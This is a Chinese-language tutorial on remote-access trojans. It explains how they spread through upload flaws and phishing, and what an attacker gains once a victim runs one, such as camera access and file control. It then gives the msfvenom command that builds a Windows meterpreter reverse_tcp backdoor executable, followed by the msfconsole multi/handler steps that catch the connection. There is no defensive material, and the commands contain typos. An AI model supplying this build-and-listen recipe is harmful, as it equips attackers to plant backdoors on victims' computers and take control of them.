远控木马被红队广泛使用,一般是由metasploit、cobaltstrike等C2控制器生成的系统可执行文件,如exe、apk、macho<苹果>文件。一般通过两种途径传播

文件上传漏洞+命令执行(主动)

文件下载钓鱼+诱导执行(钓鱼)

系统执行木马文件后,会反连之黑客服务器,黑客即可控制受害者计算机或移动设备,如开启摄像头、屏幕截屏、文件管理、软件安装。

metasploit简介及基础使用

msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。 metasploit让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几个小时的学习,就能操作系统等主流漏洞发起危害性攻击。

msfvenom生产后门木马

msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。[*msfvenom在shell里使用,不是msfconsole终端]

msfvebom -p windows/meterpreter/reverse_tcp lhost=[ip] lport=[端口] -f exe -o [名字.exe]

生成后面木马

攻击win系统

msfconsole:启动metasploit [*命令行效率高,使用方便]

启动metasploit前的准备:

/ 打开kali终端

/ 使用sudo su命令,并输入kali的密码,切换到root用户

/ 使用msfdb init命令 初始化metasploit数据库 (*可选)

msf使用法则:

1.使用模块 – use [module_name]

2.配置模块必须选 – set [opthin_name] [value]

3.运行模块 – run

三步实现对主流漏洞攻击

设置攻击模式:

use exploit/multi/handler                                                            

设置攻击载荷:

set payload windows/meterpreter/reverse_tcp                                                

设置监听ip:

set lhost [ip]                                                                

设置监听端口:

set lport [端口]                                                    

运行:

run